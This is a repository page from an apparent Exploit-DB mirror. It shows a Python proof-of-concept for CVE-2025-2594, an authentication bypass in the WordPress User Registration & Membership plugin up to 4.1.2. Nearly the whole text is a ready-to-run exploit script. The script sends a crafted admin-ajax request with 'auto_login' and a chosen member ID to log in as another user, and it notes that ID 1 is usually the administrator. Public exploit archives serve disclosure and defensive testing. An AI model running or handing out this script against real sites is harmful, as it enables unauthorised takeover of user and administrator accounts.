bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52302.py
Exploit-DB d69eaacef8 DB: 2025-05-26 
8 changes to exploits/shellcodes/ghdb

Java-springboot-codebase 1.1 - Arbitrary File Read

ABB Cylon Aspect Studio 3.08.03 - Binary Planting

ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation

Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow

WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass

Microsoft Windows Server 2016 - Win32k Elevation of Privilege

Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
2025-05-26 00:16:29 +00:00

65 lines
No EOL
2.7 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594
import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored
def banner():
cprint("┌──────────────────────────────────────────────┐", "cyan")
cprint("│ WordPress Plugin User Registration <= 4.1.2 │", "cyan")
cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
cprint("│ Author: Mohammed Idrees Banyamer │", "cyan")
cprint("└──────────────────────────────────────────────┘", "cyan")
def exploit(target_url, member_id, nonce):
endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
files = {
'action': (None, 'user_registration_membership_confirm_payment'),
'security': (None, nonce),
'form_response': (None, '{"auto_login": true}'),
'member_id': (None, str(member_id))
}
cprint(f"[+] Target URL: {endpoint}", "yellow")
cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
try:
response = requests.post(endpoint, files=files, timeout=10)
if response.status_code == 200 and '"success":true' in response.text:
cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
print("Server Response:")
print(response.text)
else:
cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
print("Server Response:")
print(response.text)
except requests.exceptions.RequestException as e:
cprint(f"[!] Request failed: {e}", "red")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
args = parser.parse_args()
exploit(args.target, args.member_id, args.nonce)
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink